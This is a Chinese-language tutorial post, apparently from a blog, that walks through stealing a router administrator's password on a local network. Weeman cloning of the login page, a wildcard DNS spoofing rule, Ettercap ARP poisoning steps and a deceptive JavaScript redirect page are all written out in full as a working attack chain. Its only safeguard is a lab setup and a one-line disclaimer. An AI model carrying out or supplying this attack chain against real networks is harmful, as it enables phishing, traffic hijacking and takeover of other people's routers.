看我如何通過Weeman+Ettercap拿下路由器管理許可權
我們大致的思路是通過weeman偽造登錄頁面,ettercap進行arp欺騙DNS劫持,從而讓管理員跳轉到我們的釣魚頁面,欺騙輸入管理密碼。
測試環境:
攻擊者: 192.168.0.101 kali linux 2016.1
目標管理員: 192.168.0.100 Windows 10
路由器管理地址: 192.168.0.1
首先我們需要生成一個偽造的登錄頁面,需要用到的工具為Weeman,關於這個的工具的介紹並不多,大家可以參考簡單易用的釣魚滲透測試工具Weeman新版發布。
1.設置偽造的目標地址:
set url http://192.168.0.1/login.aspn
2.設置埠號:
set port 8080n
3.設置轉跳地址(登錄成功後的頁面):
set action_url http://192.168.0.1/index.aspn
通過簡單的配置就可以運行了
runn
其實這個腳本只是單純的將HTML代碼進行了緩存,並沒有對支持網頁的一些資源(CSS/JavaScript/圖片)進行緩存。為了讓我們的釣魚頁面更具有欺騙效果,我們對他進行一些簡單的優化,首先我們打開正常的登錄頁面 Ctrl + S 將整站進行保存
我們將下載的文件放在與index.html同目錄(weeman根目錄)下。註:此處我們可以還需要改一下index.html引入的路徑。最終效果(時間原因並沒有加上所有圖片):
至此,我們第一步已經完成下面我們要上利器ettercap,在這之前我們先做一下簡單配置。
首先我們需要配置一下DNS文件,在etc/ettercap/etter.dns 內添加一行
* A 192.168.0.101n
* 為通配符,這一行的意思為將所有的網站全部解析到192.168.0.101(攻擊者IP)。
然後我們開啟apache服務,讓攻擊者的電腦成為一個web伺服器service apache2 start n
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">n<!DOCTYPE html>n<html>n <head>n <meta charset="utf-8">n <title></title>n <script type="text/javascript">n alert("網路連接失敗,請嘗試重新配置路由器!");n location.href=http://192.168.0.101:8080; <!--釣魚界面-->n </script>n </head>n <body>nn </body>n</html>n
這段代碼可以實現,再打開這個後彈窗 「網路連接失敗,請嘗試重新配置路由器!」,然後轉調至我們的釣魚頁面。
下面我們打開ettercap進行dns欺騙
依次選擇Sniff -> Uuified Sniffing選擇網卡
Hosts->Scan for hosts 掃描在線主機
Hosts -> Hosts list 列出在線主機列表選中 192.168.0.1 -> add to target 1 然後 192.168.0.100 -> add to target 2Mitm -> Arp Poisoning 將第一項打勾 開啟ARP欺騙我們在目標主機ping常用網站 發現解析地址已經轉到攻擊者IP
我們模擬管理員正常上網,打開一些常用網站已經成功解析到攻擊者IP ,我們點擊確定後轉跳到釣魚頁面(忽視這個不完美的釣魚頁面)。
此時,我們後台的Weeman已經成功劫持到密碼。
文章僅供參考,技術渣有問題歡迎指出。
推薦閱讀:
※xbee與zigbee的區別是什麼?
※到營業廳修手機引發的血案
※為什麼OFDM要先做ifft,先做fft收端做ifft可以嗎?
※如何製作一個有GPS定位功能的錢包?
※無線通信里的協議到底是什麼?為什麼遵循一套協議後通信速度也基本就確定了